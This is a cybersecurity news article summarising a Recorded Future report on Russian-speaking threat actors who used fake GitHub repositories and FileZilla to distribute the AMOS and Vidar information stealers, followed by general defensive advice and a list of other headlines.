Cyber Security

Hackers Exploited GitHub and FileZilla to Deliver Banking Malware

The Insikt Group at Recorded Future has found a sophisticated cybercrime operation run by Russian-speaking threat actors from the Commonwealth of Independent States (CIS).

This group of hackers has used safe websites like GitHub and FileZilla to spread banking malware, which is very dangerous for both personal and business security.

GitCaught: Exposing the Misuse of GitHub in Cyberattacks

The people behind this effort are very skilled and know a lot about how software works and how to keep users trusting it.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

They created fake GitHub accounts and repositories that resembled real software programs, such as Pixelmator Pro, 1Password, and Bartender 5.

These fake versions were filled with malware, such as the Atomic MacOS Stealer (AMOS) and Vidar, meant to access users’ computers and steal private information.

The Insight Group at Recorded Future researched and found that these types of malware were not separate incidents.

Instead, they used the same command-and-control (C2) infrastructure, which shows that they worked together to make the strikes more powerful.

This shared C2 setup makes it look like the threat actors are part of a well-organized group with a lot of money that can start long-lasting cyberattacks on various devices and operating systems.

The changing nature of these types of malware makes it very hard for standard security measures to work.

Because software is always getting smarter and more complicated, cybersecurity needs to be proactive and flexible.

Organizations are told to follow strict security rules, especially when adding code outside their settings.

Setting up a code review process for the whole company and using automated scanning tools like GitGuardian, Checkmarx, or GitHub Advanced Security can help find malware or strange patterns in the code.

FileZilla: Another Vector for Malware Distribution

The bad guys have also used FileZilla, a famous FTP client, to spread their malicious payloads along with GitHub.

Cybercriminals have been able to stage cyberattacks that steal personal information with shocking ease by using well-known internet services.

The complexity of the operation and the fact that new malware is always being made show how important it is to take a multi-layered approach to cybersecurity.

In the middle term, businesses should improve their general security by devising ways to monitor and block unauthorized programs and scripts from third parties that could be used to spread malware.

It’s also important to share information and collaborate with the larger cybersecurity community to fight complex campaigns like the one this study found.

The results from Recorded Future’s Insight Group show the importance of being alert and taking action when online threats change.

Cybercriminals still use trusted platforms to spread malware, so businesses must stay alert and use full security plans to keep their systems and data safe.

To get a full report as a PDF file with more information and a more in-depth study, click here.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers


Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Darkgate Autoit Converter Bypasses Windows Defender & Most Antiviruses

A new tool known as the Darkgate Autoit Converter Crypter has emerged on the dark…

13 hours ago

Beware of New Krampus Loader That Getting Popular in Dark Web

A new malware loader named "Krampus" has surfaced on the dark web, gaining rapid popularity…

14 hours ago

Russian Malware Cuts Off Heaters In 600 Apartments During Zero Temperatures

FrostyGoop represents a significant advancement in industrial control systems (ICS) malware, being the ninth ICS-specific…

14 hours ago

Tag-100 Hacker Group Exploiting Citrix NetScaler & F5 BIG-IP Vulnerabilities

A new threat actor, TAG-100, has emerged and is actively targeting government and private sector…

14 hours ago

Critical Docker Vulnerability Lets Hacker Bypass Authentication

A critical security vulnerability in Docker Engine has been discovered, potentially allowing attackers to bypass…

14 hours ago

ERP Provider Exposes 769 Million Records, Including API Keys And Email Addresses

A massive data breach involving ClickBalance, one of Mexico's largest Enterprise Resource Planning (ERP) technology…

14 hours ago